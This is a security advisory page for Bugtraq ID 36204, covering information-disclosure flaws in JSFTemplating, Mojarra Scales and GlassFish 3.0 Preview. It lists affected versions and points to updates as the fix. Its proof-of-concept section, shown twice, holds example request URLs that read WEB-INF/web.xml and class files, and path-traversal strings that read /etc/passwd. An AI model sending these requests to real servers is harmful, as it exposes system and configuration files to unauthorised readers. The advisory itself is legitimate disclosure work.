Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
BID:36204
Info
Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
| Bugtraq ID: | 36204 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 01 2009 12:00AM |
| Updated: | Sep 01 2009 07:02PM |
| Credit: | J. Greil of SEC Consult |
| Vulnerable: |
Sun Glassfish 3.0 Preview Project Kenai Majorra Scales 1.3.1 JSFTemplating JSFTemplating 1.2.10 |
| Not Vulnerable: |
Project Kenai Majorra Scales 1.3.2 JSFTemplating JSFTemplating 1.2.11 |
Discussion
Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
Templating for JavaServer Faces Technology (JSFTemplating) is prone to multiple information-disclosure vulnerabilities.
Successful exploits will allow authenticated attackers to obtain potentially sensitive information that may aid in further attacks.
The following are vulnerable:
Versions prior to JSFTemplating 1.2.11
versions prior to Mojarra Scales 1.3.2
GlassFish 3.0 Preview
Templating for JavaServer Faces Technology (JSFTemplating) is prone to multiple information-disclosure vulnerabilities.
Successful exploits will allow authenticated attackers to obtain potentially sensitive information that may aid in further attacks.
The following are vulnerable:
Versions prior to JSFTemplating 1.2.11
versions prior to Mojarra Scales 1.3.2
GlassFish 3.0 Preview
Exploit / POC
Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www,example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=WEB-INF/web.xml
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=index.jsp
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/some.class
http://www.example.com/scales_static_resource.jsf?file=
http://www.example.com/scales_static_resource.jsf?file=../../../../../../etc/
http://www.example.com/scales_static_resource.jsf?file=../../../../../../etc/passwd
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www,example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=WEB-INF/web.xml
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=index.jsp
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/
http://www.example.com/jsft_resource.jsf?contentSourceId=resourceCS&filename=at/mycompany/some.class
http://www.example.com/scales_static_resource.jsf?file=
http://www.example.com/scales_static_resource.jsf?file=../../../../../../etc/
http://www.example.com/scales_static_resource.jsf?file=../../../../../../etc/passwd
Solution / Fix
Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
Solution:
Updates are available. Please see the references for details.
Solution:
Updates are available. Please see the references for details.
References
Templating for JavaServer Faces Technology Multiple Information Disclosure Vulnerabilities
References:
References:
- Glassfish Homepage (GlassFish)
- JSFTemplating Homepage (JSFTemplating)
- Mojarra Scales Homepage (Project Kenai)
- SEC Consult Security Advisory < 20090901-0 > (SEC Consult)